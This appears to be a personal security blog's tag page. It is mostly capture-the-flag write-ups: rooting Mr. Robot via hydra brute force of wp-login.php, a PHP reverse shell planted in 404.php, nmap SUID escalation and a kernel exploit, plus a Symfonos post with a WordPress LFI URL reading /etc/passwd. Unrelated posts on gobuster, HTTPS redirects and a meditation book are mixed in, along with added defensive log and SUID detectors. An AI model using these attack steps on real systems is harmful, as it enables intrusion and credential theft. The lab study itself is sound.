Tag: samdup

  • Rooting Mr. Robot

    Task Goal:

    1. To get root access to the machine

    2. Acquire three keys:

        1. Key 1: 073403c8a58a1f80d943455fb30724b9
        2. Key 2: 822c73956184f694993bede3eb39f959
        3. Key 3: 04787ddef27c3dee1ee161b21670b4e4

    Resource Materials:
    Download Mr. Robot Machine from Here.
    Download Kali Linux Machine from Here.

    Information Gathering:

    Step 01: ifconfig
    Kali Linux Machine IP: 192.168.56.4

    Step 02: nmap 192.168.56.4/24
    Mr. Robot or Target Machine IP: 192.168.56.3


    Step 03: Get the details of ports and services running on the target machine

    nmap -sC -sV -p-  192.168.56.3 >  vulhub/mrrobot/nmap.log

    The scan clearly shows a web server running on ports 80 and 443. Let me visit those.

    I checked the details of the front-end and didn’t find anything of use. Then I checked the source code.

    Nothing special either.

    I read a couple of write-ups in the past and those helped me develop a methodology of my own. Usually, at this point, I check whether a robots.txt is available and, if I don’t find one, I run nikto and gobuster.

    Luckily, I found something through robots.txt.

    I want to download those files. By the look of it, I can deduce one thing: I need to get three keys, and here is the first one 🙂 Yippee!

    Step 04: Download all the materials

    wget 192.168.56.3/fsocity.dic
    wget 192.168.56.3/key-1-of-3.txt
    cat key-1-of-3.txt
    073403c8a58a1f80d943455fb30724b9

    To be honest, my happiness was short-lived. After the first key, I reached my wits’ end. Usually, at such a point, I look carefully at the things I have found, and if I don’t find anything substantial, I enumerate again.

    I have two ideas in mind. One is to play around with the word list fsocity.dic: we will launch a brute-force attack on the wp-login.php page.

    The other is to run nikto and gobuster. To save time, I am going to do everything simultaneously.

    Luckily, I ran sort on the word list first, otherwise it would definitely have taken a huge amount of time (because I found many duplicate entries in the dictionary file I downloaded from the target website).

    By the way, I saved a script to perform a wp-login.php brute-force attack some time back, and I am glad that I can use it here 🙂 (You don’t have to worry about this script; if you wish to learn how it works, you can fire up Burp Suite to see the main logic of the login request, and man hydra will help you frame the arguments.)

    Step 05:

    1. Brute-force wp-login.php

    a) We don’t know the username, so first we brute-force the username.

    hydra -vV -L fsocity.dic -p test 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    b) The username is elliot.
    Now we need to brute-force the password. Here is the command:

    hydra -vV -l elliot -P fsocity.dic 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

    And the password is: ER28-0652


    In the background, I would like to run the following two tasks (because I want to dig a little more):

    2. Run nikto

    nikto -h 192.168.56.3 > nikto-192.168.56.3.log

    3. Run gobuster

    gobuster dir -u http://192.168.56.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
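    The hydra and gobuster runs above leave a very recognisable trace in the web server’s access log. The following Python is an added example, not part of the original write-up: it flags both patterns from access-log lines. The log lines are constructed to mirror the write-up’s addresses, and the thresholds are illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: IP - - [22/Jul/2019:12:36:26 +0000] "POST /wp-login.php HTTP/1.1" 200 512
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse(line):
    """Return (ip, timestamp, method, path without query string, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def burst(stamps, window):
    """Largest number of events from one source inside any sliding window."""
    stamps, best, start = sorted(stamps), 0, 0
    for end, t in enumerate(stamps):
        while t - stamps[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def detect(lines, window=timedelta(seconds=60), login_max=20, notfound_max=50):
    """Map source IP -> set of alert names. Thresholds are illustrative; tune per site."""
    logins, notfound = defaultdict(list), defaultdict(list)
    for ip, ts, method, path, status in filter(None, map(parse, lines)):
        if method == "POST" and path == "/wp-login.php":
            logins[ip].append(ts)       # hydra: a flood of POSTs to the login form
        if status == 404:
            notfound[ip].append(ts)     # gobuster: a flood of guesses that do not exist
    alerts = defaultdict(set)
    for name, hits, limit in (("wp-login brute force", logins, login_max),
                              ("directory brute force", notfound, notfound_max)):
        for ip, stamps in hits.items():
            if burst(stamps, window) >= limit:
                alerts[ip].add(name)
    return dict(alerts)

def sample_log():
    """Constructed lines: 192.168.56.4 runs both tools, 192.168.56.10 is a normal client."""
    t0 = datetime(2019, 7, 22, 12, 36, 26, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "{req} HTTP/1.1" {st} 512'
    at = lambda i: t0 + timedelta(seconds=i)
    lines = [fmt.format(ip="192.168.56.4", ts=at(i), req="POST /wp-login.php", st=200) for i in range(25)]
    lines += [fmt.format(ip="192.168.56.4", ts=at(i), req=f"GET /guess{i}/", st=404) for i in range(60)]
    lines += [fmt.format(ip="192.168.56.10", ts=at(i), req="GET /robots.txt", st=200) for i in range(3)]
    return lines
```

    Feed `detect()` the lines of a real access log to get the same report for your own server.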

    Step 05: Took a huge amount of time (because of the brute force)

    Anyway, I logged into the website, and luckily the “Editor” function is not disabled, which means I can inject my own code there. I am going to plant a PHP reverse shell in the 404.php page, because not many developers or people care about this page.

    pentestmonkey has a great list of scripts; you can download the PHP reverse shell from here.

    I copied the shell and pasted it into 404.php.

    By the way, you need to change the IP address and port number mentioned in the PHP reverse shell. The port number can be anything of your choice; my favorite is 9000. The IP address of my Kali Linux machine is now 192.168.56.5 (I reset my machine; you won’t face this problem).

    My Kali Linux (attacker) machine is waiting for the reverse connection:

    nc -lvp 9000

    Now all I need to do is visit 404.php. It indeed threw back a reverse connection just by visiting http://192.168.56.5/404.php

    I found the second flag and a credential file. However, due to privilege restrictions, I am not able to access them.

    To be honest, at this moment I am left with no choice but to enumerate whether there are any SUID-enabled binaries on the server in order to escalate my current privileges. Let’s try. (If you need to know more about finding SUID binaries, visit this link.)

    find / -perm -u=s -type f 2>/dev/null
    /usr/local/bin/nmap --interactive
    !sh
    cat /home/robot/key-2-of-3.txt
    822c73956184f694993bede3eb39f959  [our second flag]
    cat /home/robot/password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b

    The resource on privilege escalation using nmap is here.
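    A defender running the same find command wants to know which set-uid binaries are not supposed to be there. The following Python is an added example, not part of the original write-up: it scans a tree for set-uid regular files and compares the result against a recorded baseline. The baseline list and the throw-away demo tree are constructed, with a set-uid nmap standing in for the one found on this box.

```python
import os
import stat
import tempfile

# Expected set-uid binaries for this host (constructed list for the example; in practice
# record it from a freshly installed, patched system of the same release).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/mount", "/bin/umount"}

def find_suid(root="/"):
    """Regular files under `root` with the set-uid bit, like find / -perm -u=s -type f.
    Uses lstat so a symlink pointing at a set-uid file is not counted a second time."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable entry: skip it, keep scanning
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def audit(found, baseline=BASELINE):
    """(unexpected, missing): binaries that gained set-uid, and baseline ones that lost it."""
    found = set(found)
    return sorted(found - baseline), sorted(baseline - found)

def demo_tree(setuid=True):
    """Build a throw-away tree (constructed) holding a plain file and, if `setuid`,
    a set-uid 'nmap' as on the write-up's target; return the root-relative hits."""
    root = tempfile.mkdtemp()
    plain = os.path.join(root, "bin", "ls")
    nmap = os.path.join(root, "usr", "local", "bin", "nmap")
    for p in (plain, nmap):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        open(p, "w").close()
    if setuid:
        os.chmod(nmap, 0o4755)
    return {p[len(root):] for p in find_suid(root)}

if __name__ == "__main__":
    # Real scan of this host: anything reported as unexpected deserves a look
    unexpected, missing = audit(find_suid("/"))
    print("unexpected set-uid binaries:", unexpected)
    print("baseline binaries no longer set-uid:", missing)
```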

    I tried john to crack the hash, and the VM crashed several times, so I decided to move forward. (Later I was able to crack the hash using https://crackstation.net.)

    Again I bumped into the wall, so what we need to do is enumerate more.

    I have read many articles on EternalBlue and Dirty COW, because many people recommend trying those (kernel) exploits if you have no option left. At that moment, I thought it was time to check for a kernel exploit. Therefore, I checked the kernel version, and it is indeed vulnerable to an exploit.

    Kernel version of the target machine:

    uname -r

    The kernel version is 3.13.0-55-generic, which is vulnerable to this exploit.

    I compiled the exploit on the victim machine and executed it there, and yeah, I got root as well as the third and final flag.

    gcc exploit.c -o exploit 
    ./exploit 
    id 
    cat /home/root/key-3-of-3.txt
    04787ddef27c3dee1ee161b21670b4e4

    Voila!! Finally…

    Although I had popped this machine earlier using msfconsole, this time I did it entirely manually, and it’s truly more satisfying; I learned many more cool things!!

  • How to install gobuster in Kali Linux 2020

    Hello guys,

    I am sure you are aware that the Kali Linux 2020 distro doesn’t come with gobuster pre-installed, and perhaps many of you have already compiled it and made it work on your machines.

    However, I am quite certain that there are still many people on the verge of shifting to dirb or dirbuster (which are also awesome tools) just because gobuster is not available in the new distro.

    To be honest, I wanted gobuster on my Kali machine, so I tried a couple of ways and in the end it worked.

    I thought I’d share it with you guys 🙂

    Peace!


  • Force HTTPS on WordPress

    How to implement it?

    Code (Apache mod_rewrite rules, e.g. in the site’s .htaccess):

    RewriteCond %{HTTPS} !=on
    RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301,NE]

  • “Stages of Meditation”

    I have promised myself to read a book monthly, apart from my regular work, and for the month of August I decided to read a book called “Stages of Meditation”. This book was composed by Acharya Kamalashila (a Nalanda scholar who was invited to Tibet by the King of Tibet in the 8th century), and His Holiness the Dalai Lama has given many teachings on it. I highly recommend this book to all friends who are interested in meditation. This book is written for Buddhist practitioners; however, it highlights many strategies and tips which could benefit even a non-Buddhist. For example, it mentions the diet you should follow and what kind of environment is suitable for a beginner, etc. Last but not least, I pray that this book will benefit you as much as it did me.

  • Gaining a Root Access in this rainy season, of Symfonos Machine

    Target Machine Name: Symfonos

    Information in hand:
    Kali Linux machine IP: 192.168.56.102

    To get the victim machine IP address:

    netdiscover -i eth0 -r 192.168.56.102/24

    Victim or Target Machine IP: 192.168.56.101

    Step 01: Active Scanning

    nmap -sC -sV -p- -T4 -A 192.168.56.101 -oN nmap.log
    Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; 
    
    Host script results:
    
    |_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS 
    | smb-os-discovery: 
    | OS: Windows 6.1 (Samba 4.5.16-Debian)
    | Computer name: symfonos
    | NetBIOS computer name: SYMFONOS\x00
    | Domain name: \x00
    | FQDN: symfonos
    | smb-security-mode: 
    | account_used: guest
    | authentication_level: user
    | challenge_response: supported
    |_ message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    | 2.02: 
    |_ Message signing enabled but not required
    | smb2-time: 
    | date: 2019-07-22 12:36:26
    |_ start_date: N/A

    Step 02:

    I browsed to the IP address 192.168.56.101 and an image was there.

    Since I didn’t find anything in the source code or robots.txt, I used exiftool and strings as well. That further confirmed that I needed to shift my area of interest, so I rechecked the nmap findings.

    It is running SMB, so let’s dig in.

    Click on [+Other Locations]
    Connect to server: smb://192.168.56.101/      [type this entire value]
    Click on [Connect]

    From this result, what we can deduce is that there are the following usernames:

    username:
    anonymous
    helios
    print$

    Subsequently, click on anonymous (because most of the time the anonymous user has either an empty password or “anonymous” as the password). In our case, it doesn’t require one (which means it’s empty).

    We got a few passwords from the note:

    Password:
    epidioko
    qwerty
    baseball

    Things become a little easier now, because we have three usernames and three passwords; let’s find out which combination works.

    Working Credential:

    username: helios 
    Password: qwerty

    Step 03:

    Visit: http://192.168.56.101/h3l105/

    It’s wonderful that we have now found a WordPress website.

    Step 04:

    I faced many difficulties running wpscan (the original Ruby-based scanner):

    wpscan --url http://192.168.56.101/h3l105/ --enumerate > wpscan.txt

    I manually downloaded the JSON files and updated them; nevertheless, I was not able to enumerate the plugins. Therefore, I had to use the wpscan built in Python. (Actually, I could manually enumerate the plugins and their corresponding versions; however, let’s assume the tool might be useful on other boxes as well.)

    python wordpresscan.py -u http://192.168.56.101/h3l105/

    Result:

    [i] Name: site-editor - v4.3
    [!]LFI : Site Editor <= 1.1.1 - Local File Inclusion (LFI) - ID:9044
    | Fixed in None
    | References:
    - http://seclists.org/fulldisclosure/2018/Mar/40
    - https://github.com/SiteEditor/editor/issues/2
    - Cve 2018-7422
    [i] Name: mail-masta - v5.2.2
    [!]LFI : Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - ID:8609
    | Fixed in None
    | References:
    - https://cxsecurity.com/issue/WLB-2016080220
    - Exploitdb 40290
    [!]SQLI : Mail Masta 1.0 - Multiple SQL Injection - ID:8740
    | Fixed in None
    | References:
    - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
    - Cve 2017-6095
    - Cve 2017-6096
    - Cve 2017-6097
    - Cve 2017-6098

    I am very thrilled to see the suggested exploits and plugins. I tried the first plugin and visited the repository as suggested.

    http://192.168.56.101/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

    The part of the URL that was in bold (the ajax_path parameter and its value) is the exploit. You can find the details here.

    Step 05:

    I am not sure whether it will work; however, I would like to share my plan: to try an nc (netcat) reverse connection.

    Although I tried different ways, I was not able to get a reverse connection. Therefore, I had to try a different vulnerable plugin, i.e. the mail-masta WordPress plugin.

    Details of the exploit are here.

    To be continued …

  • Will I get a root access to PumpkinGarden ?

    Overview:

    Kali Linux IP address: 192.168.56.102
    
    PumpkinGarden IP address: 192.168.56.101 


  • Kioptrix2014 – Finally

    Kioptrix2014 is one of the most recommended machines to play around with before OSCP preparation. Therefore, I am very eager to shell the box 🙂

    Setup:

    mountroot> ufs:/dev/ada0p2

    *****

    Kali Machine IP: 192.168.56.102

    Step 0:

    ifconfig


  • Exploiting Easy RM to MP3 Converter on Windows 7 (Replica)

    Around five years back, I had the privilege of learning buffer overflows from one of my dear mentors. Nevertheless, due to changes in the nature of my work, I didn’t get proper time to explore more.
    Many of my colleagues shared with me their challenges in understanding the concept, even though they were comfortable with programming; I had the opposite experience. I enjoyed the subject back then and perhaps I could say that I was the sole individual who wrote an exploit for a vulnerable application (which we had downloaded from exploit-db.com; it was war-FTP).

    However, I must confess here that I have forgotten almost everything apart from esp, eip and ebp.

    Required Software:

    Download the vulnerable app from here.

    Download Windows 7 32-bit from here. (By the way, don’t forget to take a snapshot, as after 30 days you might not be able to access the virtual machine. I chose IE11 and VirtualBox.)

    Download Immunity Debugger from here. (If you are concerned about providing a real email ID, you can put in a fake one.)

    Download Mona from here. (I must confess, I have never used mona before.)

    I will not mention where to get Kali Linux, VirtualBox, the VirtualBox extension pack, etc.
